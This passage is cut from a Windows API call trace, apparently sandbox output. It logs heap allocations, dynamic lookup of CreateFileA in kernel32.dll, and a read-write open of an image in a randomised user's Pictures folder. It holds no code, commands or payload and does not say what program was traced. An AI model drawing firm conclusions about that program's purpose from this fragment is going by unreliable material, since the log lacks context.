hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.401] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889958 [0041.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889958, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.401] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0041.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889958, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.402] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0041.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a) returned 0x7ab260 [0041.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", cchWideChar=58, lpMultiByteStr=0x7ab260, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpUsedDefaultChar=0x0) returned 58 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.403] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pispegcnl7-fjt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x7800d0 [0041.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=58, lpWideCharStr=0x7800d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png") returned 58 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.406] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.407] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.408] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.408] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.408] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.409] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.409] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0041.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88caf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.410] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.410] CloseHandle (hObject=0x140) returned 1 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 